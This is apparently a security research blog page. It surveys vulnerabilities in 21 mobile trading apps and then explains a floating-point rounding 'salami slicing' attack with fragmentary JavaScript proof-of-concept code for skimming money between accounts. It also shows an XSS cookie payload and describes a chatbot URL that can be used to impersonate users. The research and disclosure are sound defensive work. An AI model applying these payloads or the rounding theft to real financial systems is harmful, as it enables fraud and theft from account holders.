Are You Trading Securely? Insights into the (In)Security of Mobile Trading Apps
By
Alejandro Hernandez
The days of open shouting on the trading floors of the NYSE, NASDAQ, and other stock exchanges around the globe are gone. With the advent of electronic trading platforms and networks, the exchange of financial securities now is easier and faster than ever; but this comes with inherent risks.
From the beginning, bad actors have also joined Wall Street’s party, developing clever models for fraudulent gains. Their efforts have included everything from fictitious brokerage firms that ended up being Ponzi schemes[1] to organized cells performing Pump-and-Dump scams.[2] (Pump: buy cheap shares and inflate the price through sketchy financials and misleading statements to the marketplace through spam, social media and other technological means; Dump: once the price is high, sell the shares and collect a profit).
When it comes to financial cybersecurity, it’s worth noting how banking systems are organized when compared to global exchange markets. In banking systems, the information is centralized into one single financial entity; there is one point of failure rather than many, which make them more vulnerable to cyberattacks.[3] In contrast, global exchange markets are distributed; records of who owns what, who sold/bought what, and to whom, are not stored in a single place, but many. Like matter and energy, stocks and other securities cannot be created from the void (e.g. a modified database record within a financial entity). Once issued, they can only be exchanged from one entity to another. That said, the valuable information as well as the attack surface and vectors in trading environments are slightly different than those in banking systems.
Picture taken from http://business.nasdaq.com/list/
Over the years I’ve used the desktop and web platforms offered by banks in my country with limited visibility of available trade instruments. Today, accessing global capital markets is as easy as opening a Facebook account through online brokerage firms. This is how I gained access to a wider financial market, including US-listed companies. Anyone can buy and sell a wide range of financial instruments on the secondary market (e.g. stocks, ETFs, etc.), derivatives market (e.g. options, binary options, contracts for difference, etc.), forex markets, or the avant-garde cryptocurrency markets.
Most banks with investment solutions and the aforementioned brokerage houses offer mobile platforms to operate in the market. These apps allow you to do things including, but not limited to:
Fund your account via bank transfers or credit card
Keep track of your available equity and buying power (cash and margin balances)
Monitor your positions (securities you own) and their performance (profit)
Monitor instruments or indexes
Give buy/sell orders
Create alerts or triggers to be executed when certain thresholds are reached
Receive real-time news or video broadcasts
Stay in touch with the trading community through social media and chats
Needless to say, whether you’re a speculator, a very active intra-day trader, or simply someone who likes to follow long-term buy-and-hold strategies, every single item on the previous list must be kept secret and only known by and shown to its owner.
Four months ago, while using my trading app, I asked myself, “with the huge amount of money transacted in the money market, how secure are these mobile apps?” So, there I was, one minute later, starting this research to expose cybersecurity and privacy weaknesses in some of these apps.
Before I pass along my results, I’d like to share the interesting and controversial moral of the story: The app developed by a brokerage firm who suffered a data breach many years ago was shown to be the most secure one.
Scope
My analysis encompassed the latest version of 21 of the most used and well-known mobile trading apps available on the Apple Store and Google Play. Testing focused only on the mobile apps; desktop and web platforms were not tested. While I discovered some security vulnerabilities in the backend servers, I did not include them in this article.
Devices:
iOS 10.3.3 (iPhone 6) [not jailbroken]
Android 7.1.1 (Emulator) [rooted]
I tested the following 14 security controls, which represent just the tip of the iceberg when compared to an exhaustive list of security checks for mobile apps. This may give you a better picture of the current state of these apps’ security. It’s worth noting that I could not test all of the controls in some of the apps either because a feature was not implemented (e.g. social chats) or it was not technically feasible (e.g. SSL pinning that wouldn’t allow data manipulation), or simply because I could not open an account.
Results
Unfortunately, the results proved to be much worse than those for personal banking appsin 2013 and 2015.[4] [5] Cybersecurity has not been on the radar of the FinTech space in charge of developing trading apps. Security researchers have disregarded these apps as well, probably because of a lack of understanding of money markets.
The issues I found in the tested controls are grouped in the following sections. Logos and technical details that mention the name of brokerage institutions were removed from the screenshots, logs, and reverse engineered code to prevent any negative impacts to their customers or reputation.
Cleartext Passwords Exposed
In four apps (19%), the user’s password was sent in cleartext either to an unencrypted XML configuration file or to the logging console. Physical access to the device is required to extract them, though.
In a hypothetical attack scenario, a malicious user could extract a password from the file system or the logging functionality without any in-deptfh know-how (it’s relatively easily), log in through any other trading platform from the brokerage firm, and perform unauthorized actions. They could sell stocks, transfer the money to a newly added bank account, and delete this bank account after the transfer is complete. During testing, I noticed that most of the apps require only the current password to link banking accounts and do not have two-factor authentication (2FA) implemented, therefore, no authorization one-time-password (OTP) is sent to the user’s phone or email.
In two apps, like the following one, in addition to logging the username and password, authentication takes place through an unencrypted HTTP channel:
In another app, the new password was exposed in the logging console when a user changes the password:
Trading and Account Information Exposed
In the trading context, operational or strategic data must not be sent unencrypted to the logging console nor any log file. This sensitive data encompasses values such as personal data, general balances, cash balance, margin balance, net worth, net liquidity, the number of positions, recently quoted symbols, watchlists, buy/sell orders, alerts, equity, buying power, and deposits. Additionally, sensitive technical values such as username, password, session ID, URLs, and cryptographic tokens should not be exposed either.
62% of the apps sent sensitive data to log files, and 67% stored it unencrypted. Physical access to the device is required to extract this data.
If these values are somehow leaked, a malicious user could gain insight into users’ net worth and investing strategy by knowing which instruments users have been looking for recently, as well as their balances, positions, watchlists, buying power, etc.
Imagine a hypothetical scenario where a high-profile, sophisticated investor loses his phone and the trading app he has been using stores his “Potential Investments” watchlist in cleartext. If the extracted watchlist ends up in the hands of someone who wants to mimic this investor’s strategy, they could buy stocks prior to a price increase. In the worst case, imagine a “Net Worth” figure landing in the wrong hands, say kidnappers, who now know how generous ransom could be.
Balances and investment portfolio leaked in logs:
Buy and sell orders leaked in detail in the logging console:
Personal information stored in configuration files:
“Potential Investments” and “Will Buy Later” watchlists leaked in the logs console:
“Favorites” watchlists leaked in the logs too:
Quoted tickers leaked:
Symbol quoted dumped in detail in the console:
Quoted instruments saved in a local SQLite database:
Account number and balances leaked:
Insecure Communication
Two apps use unencrypted HTTP channels to transmit and receive all data, and 13 of 19 apps that use HTTPS do not check the authenticity of the remote endpoint by verifying its SSL certificate (SSL pinning); therefore, it’s feasible to perform Man-in-the-Middle (MiTM) attacks to eavesdrop on and tamper with data. Some MiTM attacks require to trick the user into installing a malicious certificate on the mobile device.
Under certain circumstances, an attacker with access to some part of the network, such as the router in a public Wi-Fi, could see and modify information transmitted to and from the mobile app. In the trading context, a malicious actor could intercept and alter values, such as the bid or ask prices of an instrument, and cause a user to buy or sell securities based on misleading information.
For instance, the following app uses an insecure channel for communication by default; an inexperienced user who does not know the meaning of “SSL” (Secure Socket Layer) won’t enable it on the login screen and all sensitive data will be sent and received in cleartext, without encryption:
One single app was found to send a log file with sensitive trading data to the server on a scheduled basis over an unencrypted HTTP channel.
Some apps transmit non-sensitive data (e.g. public news or live financial TV broadcastings) through insecure channels, which does not seem to represent a risk to the user.
Authentication and Session Management
Nowadays, most modern smartphones support fingerprint-reading, and most trading apps use it to authenticate their customers. Only five apps (24%) do not implement this feature.
Unfortunately, using the fingerprint database in the phone has a downside:
Moreover, after clicking the logout button, sessions were still valid on the server side in two apps. Also, another couple of apps enforced lax password policies:
Privacy Mode
One single trading app (look for “the moral of the story” earlier in this article) supports “Privacy Mode,” which protects the customers’ private information displayed on the screen in public areas where shoulder-surfing[6] attacks are feasible. The rest of the apps do not implement this useful and important feature.
However, there’s a small bug in this unique implementation: every sensitive figure is masked except in the “Positions” tab where the “Net Liquidity” column and the “Overall Totals” are fully visible:
It’s worth noting that not only balances, positions, and other sensitive values in the trading context should be masked, but also credit card information when entered to fund the account:
Client-side Data Validation
In most, but not all, of the apps that don’t check SSL certificates, it’s possible to perform MiTMattacks and inject malicious JavaScript or HTML code in the server responses. Since the Web Views in ten apps are configured to execute JavaScript code, it’s possible to trigger common Cross-site Scripting (XSS) attacks.
XSS triggered in two different apps (<script>alert(document.cookie);</script>):
Fake HTML forms injected to deceive the user and steal credentials:
Root Detection
Many Android apps do not run on rooted devices for security reasons. On a rooted phone or emulator, the user has full control of the system, thus, access to files, databases, and logs is complete. Once a user has full access to these elements, it’s easy to extract valuable information.
20 of the apps (95%) do not detect rooted environments. The single app (look for “the moral of the story” earlier in this article) that does detect it simply shows a warning message; it allows the user to keep using the platform normally:
Hardcoded Secrets in Code and App Obfuscation
Six Android app installers (.apk files) were easily reverse engineered to human-readable code. The rest had medium to high levels of obfuscation, as the one shown below. The goal of obfuscation is to conceal the applications purpose (security through obscurity) and logic in order to deter reverse engineering and to make it more difficult.
In the non-obfuscated apps, I found secrets such as cryptographic keys and third-party service partner passwords. This could allow unauthorized access to other systems that are not under the control of the brokerage houses. For example, a Morningstar.com account (investment research) hardcoded in a Java class:
Interestingly, ten of the apps (47%) have traces (internal hostnames and IPs) about the internal development and testing environments where they were made or tested:
Other Weaknesses
The following trust issue grabbed my attention: a URL with my username (email) and first name passed as parameters was leaked to the logging console. This URL is opened to talk with, apparently, a chatbot inside the mobile app, but if you grab this URL and open it in a common web browser, the chatbot takes your identity from the supplied parameters and trusts you as a logged in user. From there, you can ask details about your account. As you can see, all you need to retrieve someone else’s private data is to know his/her email only and his/her name:
I haven’t had enough time to fully test this feature, but so far, I was able to extract balances and personal information.
Statistics
Since a picture is worth a thousand words, consider the following graphs:
Responsible Disclosure
One of IOActive’s missions is to act responsibly when it comes to vulnerability disclosure, thus, between September 6th and 8th, we sent a detailed report to 13 of the brokerage firms whose trading apps presented some of the higher risks vulnerabilities discussed in this article.
To the date, only two brokerage firms replied our email.
Regulators and Rating Organizations
Digging in some US regulators’ websites,[7] [8] [9] I noticed that they are already aware of the cybersecurity threats that might negatively impact financial markets and stakeholders. Most of the published content focuses on general threats that could impact end-users or institutions such as phishing, identity theft, antivirus software, social media risks, privacy, and procedures to follow in case of cybersecurity incidents, such as data breaches or disruptive attacks.
Nevertheless, I did not find any documentation related to the security risks of electronic trading nor any recommended guidance for secure software development to educate brokers and FinTech companies on how to create quality products.
Picture taken from http://www.reuters.com/article/net-us-internet-lending/for-online-lenders-wall-street-cash-brings-growth-and-risk-idUSBRE96204I20130703
In addition, there are rating organizations that score online brokers on a scale of 1 to 5 stars. I glimpsed at two recent reports [10] [11] and didn’t find anything related to security or privacy in their reviews. Nowadays, with the frequent cyberattacks in the financial industry, I think these organizations should give accolades or at least mention the security mechanisms the evaluated trading platforms implement in their reviews. Security controls should equal a competitive advantage.
Conclusions and Recommendations
There’s still a long way to go to improve the maturity level of security in mobile trading apps.
Desktop and web platforms should also be tested and improved.
Regulators should encourage brokers to implement safeguards for a better trading environment.
In addition to the generic IT best practices for secure software development, regulators should develop trading-specific guidelines to be followed by the brokerage firms and FinTech companies in charge of creating trading software.
Brokerage firms should perform regular internal audits to continuously improve the security posture of their trading platforms.
Developers should analyze their apps to determine if they suffer from the vulnerabilities I have described in this post, and if so, fix them.
Developers should design new, more secure financial software following secure coding practices.
End users should enable all of the security mechanisms their apps offer.
Side Thought
Remember: the stock market is not a casino where you magically get rich overnight. If you lack an understanding of how stocks or other financial instruments work, there is a high risk of losing money quickly. You must understand the market and its purpose before investing.
With nothing left to say, I wish you happy and secure trading!
Two years ago, I decided to conduct research in order to obtain a global view of the state of security of mobile banking apps from some important banks. In this blog post, I will present my latest results to show how the security of the same mobile banking apps has evolved.
Sometimes when buying something that costs $0.99 USD (99 cents) or $1.01 USD (one dollar and one cent), you may pay an even dollar. Either you or the cashier may not care about the remaining penny, and so one of you takes a small loss or profit.
Rounding at the cash register is a common practice, just as it is in programming languages when dealing with very small or very large numbers. I will describe here how an attacker can make a profit when dealing with the rounding mechanisms of programming languages.
Lack of precision in numbers
IEEE 754 standard has defined floating point numbers for more than 30 years. The requirements that guided the formulation of the standard for binary floating-point arithmetic provided for the development of very high-precision arithmetic.
The standard defines how operations with floating point numbers should be performed, and also defines standard behavior for abnormal operations. It identifies five possible types of floating point exceptions: invalid operation (highest priority), division by zero, overflow, underflow, and inexact (lowest priority).
We will explore what happens when inexact floating point exceptions are triggered. The rounded result of a valid operation can be different from the real (and sometimes infinitely precise) result and certain operations may go unnoticed.
Rounding
Rounding takes an exact number and, if necessary, modifies it to fit in the destination’s format. Normally, programming languages do not alert for the inexact exception and instead just deliver the rounded value. Nevertheless, documentation for programming languages contains some warnings about this:
Ruby clearly states that floating point has a different arithmetic and is a inexact number.
To exemplify this matter, this is how the number 0.1 looks internally in Python:
The decimal value 0.1 cannot be represented precisely when using binary notation, since it is an infinite number in base 2. Python will round the previous number to 0.1 before showing the value.
Salami slicing the decimals
Salami slicing refers to a series of small actions that will produce a result that would be impossible to perform all at once. In this case, we will grab the smallest amount of decimals that are being ignored by the programming language and use that for profit.
Let’s start to grab some decimals in a way that goes unnoticed by the programming language. Certain calculations will trigger more obvious differences using certain specific values. For example, notice what happens when using v8 (Google’s open source JavaScript engine) to add the values 0.1 plus 0.2:
Perhaps we could take some of those decimals without JavaScript noticing:
But what happens if we are greedy? How much can we take without JavaScript noticing?
That’s interesting; we learned that it is even possible to take more than what was shown, but no more than 0.00000000000000008 from that operation before JavaScript notices.
I created a sample bank application to explain this, pennies.js:
// This is used to wire money
function wire(deposit, money, withdraw) {
account[deposit] += money;
account[withdraw] -= money;
if(account[withdraw]<0)
return 1; // Error! The account can not have a negative balance
for(i = 0.000000000000000001; i < 0.1; i+=0.0000000000000000001) {
reset_values();
wire(1, i, 0); // I will transfer some cents from the account 0 to the account 1
if(account[0]==initial_deposit && i>profit) {
profit = i;
// print(“I can grab “+profit.toPrecision(21));
} else {
break;
}
}
print(” Found: “+profit.toPrecision(21));
print(“n2) Let’s start moving some money:”);
reset_values();
start = new Date().getTime() / 1000;
for (j = 0; j < 10000000000; j++) {
for (i = 0; i < 1000000000; i++) {
wire(1, profit, 0); // I will transfer some cents from the account 0 to the account 1
}
finish = new Date().getTime() / 1000;
print_balance(finish-start);
}
The attack against it will have two phases. In the first phase, we will determine the maximum amount of decimals that we are allowed to take from an account before the language notices something is missing. This amount is related to the value from which we are we taking: the higher the value, the higher the amount of decimals. Our Bank Account 0 will have $1,000,000 USD to start with, and we will deposit our profits to a secondary Account 1:
Due to the decimals being silently shifted to Account 1, the bank now believes that it has more money than it actually has.
Another possibility to abuse the loss of precision is what happens when dealing with large numbers. The problem becomes visible when using at least 17 digits.
Now, the sample attack application will occur on a crypto currency, fakecoin.js:
// This is used to wire money
function wire(deposit, money, withdraw) {
account[deposit] += money;
account[withdraw] -= money;
if(account[withdraw]<0) {
return 1; // Error! The account can not have a negative balance
wire(1, j, 0); // I will transfer a few cents from the account 0 to the account 1
if(account[0]==initial_deposit && j > profit) {
profit = j;
} else {
break;
}
}
print(” Found: “+profit);
reset_values();
start = new Date().getTime() / 1000;
print(“n2) Let’s start moving some money”);
for (j = 0; j < 10000000000; j++) {
for (i = 0; i < 1000000000; i++) {
wire(1, profit, 0); // I will transfer my 29 cents from the account 0 to the account 1
}
finish = new Date().getTime() / 1000;
print_balance(finish-start);
}
We will buy 10000000000000000 units of Fakecoin (with each coin valued at $0.00000000011 USD) for a total value of $1,100,000 USD. We will transfer one Fakecoin at the time from Account 0 to a second account that will hold our profits (Account 1). JavaScript will not notice the missing Fakecoin from Account 0, and will allow us to profit a total of approximately $2,300 USD per day:
Depending on the implementation, a hacker can used either float numbers or large numbers to generate money out of thin air.
Conclusion
In conclusion, programmers can avoid inexact floating point exceptions with some best practices:
If you rely on values that use decimal numbers, use specialized variables like BigInteger in Java.
Do not allow values larger than 16 digits to be stored in variables and truncate decimals, or
Use libraries that rely on quadruple precision (that is, twice the amount of regular precision).
By continuing to use the site, you agree to the use of cookies. more information
The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.